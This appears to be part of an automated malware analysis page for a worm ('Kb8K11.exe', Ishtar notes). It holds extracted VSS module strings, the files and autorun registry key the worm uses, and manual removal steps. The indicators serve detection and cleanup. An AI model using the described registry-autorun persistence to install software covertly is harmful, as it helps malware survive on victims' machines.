INFO: Attempting to create a Volume Name for hidden volume device %s...
CVssHardwareProviderWrapper::WriteDeviceNames
CVssHardwareProviderWrapper::LogSecurityAuditsForProviderImport
Logging security audit for hardware snapshot import.
CVssHardwareProviderWrapper::IsMatchLun
BEGIN (Volume with mapping index %d)
CVssHardwareProviderWrapper::BuildLunMappingStructure
CVssHardwareProviderWrapper::RemoveUnexposedSnaphots
Decremented rundown from %d --> %d
Finding disks for pack %s
Found pack %s guid {%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x} to be the online pack
CVssHardwareProviderWrapper::OnVolmgrFoundForMergeOrSplit
CVssHardwareProviderWrapper::CheckForActiveTxfTransactionOnVolume
CVssHardwareProviderWrapper::OnlineDynamicDisks
GetVolumeInformation failed for volume index %d
TxF recovery failed: transaction flag is still active for volume %s
No TxF transaction on volume %s found
Active TxF transaction on volume %s found
Performing TxF recovery for volume #%ld %s
TxF recovery not supported for volume index %d
No TxF recovery needed for volume index %d
No explicit TxF recovery needed due to transportable import or implicit TxF recovery on autorecovery
CVssHardwareProviderWrapper::PerformTxfRecoveryOnVolumes
Import fails because not all hidden volumes arrived in the system. Cannot import snapshots.
Disk no %d with LUN id {%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x} and VDS_LUN_INFORMATION:
- Import will fail now with VSS_E_NO_SNAPSHOTS_IMPORTED (mapping index: %d)
ERROR: Volume (Mapping index %d) did not arrive in the system
volume[%u]->m_bImported = %s
volume[%u]->m_bExposed = %s
volume[%u]->m_wszDevice = %s
Wait operation timed out without finding all volumes, attempt %d.
Not all dynamic disks could be made online. Cannot import snapshots.
Found %u volumes in Pre or Snapshot state
CVssHardwareProviderWrapper::ExposeRecoveredVolumes
Hidden volume for mapping index %d did not arrive in the system, or it arrived as a non-hidden volume
Found %u volumes in either Check or Pre states.
CVssHardwareProviderWrapper::ExposeVolumes
CVssHardwareProviderWrapper::LocateAndExposeVolumes
Importing snapshots for Provider ID = {%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x}
CVssHardwareProviderWrapper::ImportSnapshotSetInternal
d:\w7rtm\base\stor\vss\modules\coord\src\hwinst.cxx
CVssHardwareProviderInstance::QueryInterface
CVssHardwareProviderInstance::AddRef
CVssHardwareProviderInstance::SetContext
CVssHardwareProviderInstance::QueryInternalInterface
CVssHardwareProviderInstance::PreFinalCommitSnapshots
CVssHardwareProviderInstance::CreateInstance
CVssHardwareProviderInstance::Release
CVssHardwareProviderInstance::AddSnapshotSet
CVssHardwareProviderInstance::ImportSnapshotSet
CVssHardwareProviderInstance::BeginPrepareSnapshot
Returning string: %s
Invalid identifier buffer %d [%p, %p, %p]
Overlapping identifier %d [%p, %p, %p]
Invalid start pointer for identifier %d [%p, %p, %p %p]
Invalid STORAGE_DEVICE_ID_DESCRIPTOR structure. Integer overrun [%p, %p, %d]
d:\w7rtm\base\stor\vss\modules\coord\src\hwutils.cxx
CVssHardwareProviderWrapper::IsValidBuffer
Identifier %d is filtered out because of zero size (actually %d) or non-device association.
Integer overflow when building the VDS_STORAGE_IDENTIFIER structure. [%d]
CVssHardwareProviderWrapper::CopyStorageDeviceIdDescriptorToLun
CVssHardwareProviderWrapper::BuildStorageDeviceIdDescriptor
CVssHardwareProviderWrapper::CopySDString
CVssHardwareProviderWrapper::FreeLunInfo
CVssHardwareProviderWrapper::GetLocalComputerName
Device %s is a CD-ROM.
malloc failed to allocate a buffer size of %d
IOCTL_MOUNTDEV_QUERY_DEVICE_NAME failed on device %s
CVssHardwareProviderWrapper::IsDeviceCDRom
CVssHardwareProviderWrapper::DisknoToPhysicalDrive
\\.\PHYSICALDRIVE%u
CVssHardwareProviderWrapper::EnumeratePacksInVolmgr
CVssHardwareProviderWrapper::GetLunInformation
CVssHardwareProviderWrapper::SaveLunInformation
* PARAM %s: %s %s %s
%s %s
CVssHardwareProviderWrapper::TraceBinaryBuffer
CVssHardwareProviderWrapper::EnumerateDisksInPack
CVssHardwareProviderWrapper::DiskClosureGuidsToDiskNumbers
%s (%lu)
CVssHardwareProviderWrapper::WriteStorageIdDescriptorToBuffer
* PARAM %s: END VDS_STORAGE_IDENTIFIER %s[%d,%d]
* PARAM %s: m_rgbIdentifier:
* PARAM %s: m_cbIdentifier = %lu
* PARAM %s: m_Type = %lu (%s)
* PARAM %s: m_CodeSet = %lu (%s)
* PARAM %s: BEGIN VDS_STORAGE_IDENTIFIER %s[%d,%d]
CVssHardwareProviderWrapper::TraceVdsStorageIdentifier
* PARAM %s: END VDS_INTERCONNECT %s[%d,%d]
* PARAM %s: m_pbAddress:
* PARAM %s: m_cbAddress = %lu
* PARAM %s: m_pbPort:
* PARAM %s: m_cbPort = %lu
* PARAM %s: m_addressType = %lu
* PARAM %s: BEGIN VDS_INTERCONNECT %s[%d,%d]
CVssHardwareProviderWrapper::TraceVdsInterconnect
CVssHardwareProviderWrapper::ChangePartitionProperties
CVssHardwareProviderWrapper::LogVdsLunInfo
* PARAM %s: END VDS_STORAGE_DEVICE_ID_DESCRIPTOR %s[%d]
* PARAM %s: m_cIdentifiers = %lu
* PARAM %s: m_version = %lu
* PARAM %s: BEGIN VDS_STORAGE_DEVICE_ID_DESCRIPTOR %s[%d]
CVssHardwareProviderWrapper::TraceVdsStorageDeviceIdDescriptor
CVssHardwareProviderWrapper::SetAutoRecoverAttribute
Moving disk %d (drive %s) into DetectSnapshot state with LUN id {%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x}
Disk %d (drive %s) already entered DetectSnapshot state.
CVssHardwareProviderWrapper::MoveDiskToDetectSnapState
Moving disk %d (drive %s) into NormalDisk state
Disk %d (drive %s) already entered NormalDisk state.
CVssHardwareProviderWrapper::MoveDiskToNormalState
* PARAM %s: END VDS_LUN_INFORMATION %s[%d]
* PARAM %s: m_cInterconnects = %lu
* PARAM %s: m_diskSignature = {%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x}
* PARAM %s: m_szSerialNumber = '%hs'
* PARAM %s: m_szProductRevision = '%hs'
* PARAM %s: m_szProductId = '%hs'
* PARAM %s: m_szVendorId = '%hs'
* PARAM %s: m_BusType = %lu
* PARAM %s: m_bCommandQueueing = %lu (%s)
* PARAM %s: m_DeviceTypeModifier = %lu
* PARAM %s: m_DeviceType = %lu
* PARAM %s: m_version = %lu
CVssHardwareProviderWrapper::TraceVdsLunInfo
* PARAM %s: BEGIN VDS_LUN_INFORMATION for %s: %s[%d]
CreateFileW(%s) - BuildLunInfoForDrive
Error [0xlx] while opening LUN %s ...
CreateFileW(%s) [0xlx]
Missing LUN. Error [0xlx] while opening LUN %s ...
IOCTL_DISK_GET_DRIVE_LAYOUT_EX returned RAW partition style on %s
IOCTL_DISK_GET_DRIVE_LAYOUT_EX returned unknown partition style on %s [%d]
IOCTL_DISK_GET_DRIVE_LAYOUT_EX(%s) - BuildLunInfoForDrive
Error [0xlx] while getting the drive layout information for LUN %s ...
- END StorageDeviceIdProperty [%s]
Identifier [%d]:
Version: %u
Number of Storage Identifiers: %u
- BEGIN StorageDeviceIdProperty [%s]
Page 83 info for drive %s
SCSI Inq Page 83 failed on %s [0xlx]
Getting the Page 83 information for drive %s ...
- Bus type: %d
- Command Queueing: %d
- Device Type Modifier: %d
- Device Type: %d
Page 80 info for drive %s
IOCTL_STORAGE_QUERY_PROPERTY(%s) fails - BuildLunInfoForDrive [0xlx]
Getting the Page 80 information for drive %s ...
IOCTL_DISK_GET_SNAPSHOT_INFO(%s) - BuildLunInfoForDrive fails with [0xlx]
Finding Snapshot Info for drive %s ...
- Device number: %u
IOCTL_STORAGE_GET_DEVICE_NUMBER(%s) - BuildLunInfoForDrive
Error [0xlx] while getting the device number for LUN %s ...
Getting the device number for drive %s ...
Build LUN info for drive %s ...
CVssHardwareProviderWrapper::BuildLunInfoForDrive
Device %s for original volume %s given LUN id{%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x}
Original volume %s also lies on %s. It already has LUN id{%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x}
CVssHardwareProviderWrapper::WriteSnapshotInfoOnOriginalLuns
CVssHardwareProviderWrapper::RemoveSnapshotInfoFromOriginalLuns
IOCTL_VOLUME_GET_VOLUME_DISK_EXTENTS(%s) returned zero extents
Fail to open handle to volume %s hr 0xlx
CVssHardwareProviderWrapper::MoveVolumeDisksToNormalState
IOCTL_DISK_GET_SNAPSHOT_INFO fails on %s
Cannot online LUN %s. CreateFileW fails with [0xlx]
Snapshot state found: %u, expected: %u
CVssHardwareProviderWrapper::CountVolsWithDisksInState
Fail to make %s online and writable, IOCTL_DISK_SET_DISK_ATTRIBUTES fails with [0xlx]
Disk %s (disk %d) is now online and writable
CVssHardwareProviderWrapper::OnlineDisksInState
IOCTL_DISK_SET_SNAPSHOT_INFO fails for %s
CVssHardwareProviderWrapper::TransitionDisksInState
GetVolumeNameForVolumeMountPoint(%s) fail on second time. with 0xlx.
GetVolumeNameForVolumeMountPoint(%s) fails with 0xlx.
CVssHardwareProviderWrapper::GetVolumeUniqueName
IOCTL_VOLMGR_MERGE_DISKS fails. [winerror %d]
CVssHardwareProviderWrapper::MergeDisksFromSourceToTarget
Fail to find snapshot info for disk %s for this volume, returning false
Device %s is a CD-ROM and therefore is not supported. Skipping.
Build LUN info for volume %s ...
CVssHardwareProviderWrapper::BuildLunInfoFromVolume
d:\w7rtm\base\stor\vss\modules\coord\src\hwdeviceobj.cxx
- Partition no %d, starting offset 0x6I64x and PartitionId {%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x}
Found GPT disk with %d partitions and DiskId {%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x}
Disk id for disk no %d
Found local GPT disk partition %d at offset 0x6I64x matches snapshot info partition %d offset 0x6I64x with ID {%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x} , returning TRUE
No match found for partition %d offset 0x6I64x guid {%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x} matches
Partition style comparison fails %d != %d, returning FALSE
The snapshot disk format has changed partition syle, originally %d, currently %d.This is not supported. The signature will not be reverted.
ERROR - The size of this MBR disk id is %d != sizeof(VSS_DISK_ID) ?
Snap info partition no %d, starting offset 0x6I64x and PartitionId {%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x} is not found anywhere on the local disk layout. The signature will not be reverted.
It matches local disk partition no %d, starting offset 0x6I64x and PartitionId {%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x}
Found snap info partition no %d, starting offset 0x6I64x and PartitionId {%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x}
IOCTL_DISK_GET_SNAPSHOT_INFO(%s) fails
Error [0xlx] while getting the snapshot info for LUN %s ...
- Reading snapshot info (if present) for %s...
CVssHwSnapshotInfo::LoadSnapshotInfo
CVssHwSnapshotInfo not properly initialized for %s
CVssHwSnapshotInfo::GetState
IOCTL_STORAGE_GET_DEVICE_NUMBER - Error [0xlx] while getting the device number for LUN %s
Bad state of CVssHwSnapshotInfo object
CVssHwSnapshotInfo::LoadDiskNumber
Device has unsupported partition style %d. Only MBR and GPT supported.
Fail to get Disk signature/id information, IOCTL_DISK_GET_DRIVE_LAYOUT_EX fails with winerror %d
CVssHwSnapshotInfo::LoadDiskId
(%p) Received signal: (Event: %ld, Device class ID: {%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x}, Device: %s) - match: %s
Event: %ld, Struct size: %ld, Device class ID: {%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x}, Device: %s)
CreateFileW(%s)
CreateFileW(%s) fails [%#x]
CreateFileW(%s) == 0xlx
- Opening Disk: %s ...
CVssHwSnapshotInfo::Initialize
IOCTL_DISK_SET_SNAPSHOT_INFO(%s) fails with winerror %d
CVssHwSnapshotInfo::Save
Integer overflow - cannot support that many disks
Reallocating for internal storage, m_dwCurrentCapacity %d m_dwDisksFound %d
Device type: %d
SetupDiGetDeviceInterfaceDetail(devInfo, &, NULL, 0, &, NULL) fails winerror %d

Kb8K11.exe_3060_rwx_00D30000_0000B000:

|$83|$ 1

svchost.exe_3412:



Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    %original file name%.exe:1828
    eventvwr.exe:3976
    Kb8K11.exe:2916
    Kb8K11.exe:1812
    Kb8K11.exe:2992
    Kb8K11.exe:2980
    Kb8K11.exe:1008

  2. Delete the original Worm file.
  3. Delete or disinfect the following files created/modified by the Worm:

    C:\Users\"%CurrentUserName%"\Desktop\aacc754ec9d2c845825c2e1a1518cbe5.docx (6 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Kb8K11.exe (15424 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Kb8K11.tmp (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\~pE6D0A8772EB1.tmp (221 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\~mE6D0A8772EB1.tmp (280 bytes)
    C:\ProgramData\VMware\VMware Tools\manifest.txt (345 bytes)
    C:\Users\Public\Pictures\Sample Pictures\Desert.jpg (2631 bytes)
    C:\totalcmd\SIZE!.TXT (1419 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\README-ISHTAR.txt (1 bytes)
    C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg (2152 bytes)
    C:\totalcmd\HISTORY.TXT (1613 bytes)
    C:\totalcmd\DEFAULT.BAR (2187 bytes)
    C:\ISHTAR.DATA (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\ISHTAR.DATA (143 bytes)
    C:\ProgramData\VMware\VMware Tools\Unity Filters\googledesktop.txt (1227 bytes)
    C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg (1398 bytes)
    C:\totalcmd\KEYBOARD.TXT (852 bytes)
    C:\ProgramData\VMware\VMware Tools\Unity Filters\win7gadgets.txt (1035 bytes)
    C:\ProgramData\VMware\VMware Tools\Unity Filters\vistasidebar.txt (2059 bytes)
    C:\ProgramData\VMware\VMware Tools\Unity Filters\microsoftoffice2003.txt (1163 bytes)
    C:\ProgramData\VMware\VMware Tools\Unity Filters\adobephotoshopcs3.txt (714 bytes)
    C:\totalcmd\NO.BAR (299 bytes)
    C:\ProgramData\VMware\VMware Tools\Unity Filters\adobeflashcs3.txt (435 bytes)
    C:\ProgramData\VMware\VMware Tools\Unity Filters\vmwarefilters.txt (26 bytes)
    C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg (2252 bytes)
    C:\README-ISHTAR.txt (1 bytes)
    C:\totalcmd\REGISTER.RTF (200 bytes)
    C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg (2389 bytes)
    C:\Users\Public\Videos\Sample Videos\Wildlife.wmv (5351 bytes)
    C:\Users\"%CurrentUserName%"\Documents\Outlook Files\mar.kus@bigmir.net.pst (608 bytes)
    C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg (1474 bytes)
    C:\Users\Public\Pictures\Sample Pictures\Koala.jpg (2391 bytes)
    C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg (2128 bytes)
    C:\Users\"%CurrentUserName%"\Desktop\README-ISHTAR.txt (1 bytes)
    C:\ProgramData\VMware\VMware Tools\Unity Filters\visualstudio2005.txt (523 bytes)
    C:\Users\"%CurrentUserName%"\Desktop\ISHTAR.DATA (1 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\Kb8K11.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
